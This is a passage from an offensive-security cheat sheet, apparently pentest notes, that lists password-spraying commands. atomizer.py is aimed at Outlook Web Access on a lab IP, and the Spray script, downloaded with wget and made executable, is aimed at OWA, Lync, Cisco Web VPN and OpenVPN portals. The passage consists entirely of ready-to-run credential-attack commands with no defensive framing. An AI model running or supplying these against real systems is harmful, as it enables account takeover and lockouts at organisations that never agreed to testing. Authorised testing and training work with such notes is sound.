python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01         

## ------------------| Using Spray.sh
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestsFile>
```

### 04.25 Lync

```bash
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -lync <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>            
```

### 04.26 CISCO Web VPN

```bash
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -cisco <targetURL> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
```

### 04.27 OpenVPN Web Portal

```bash
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -ovpn <targetIP> <targetPort> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
```

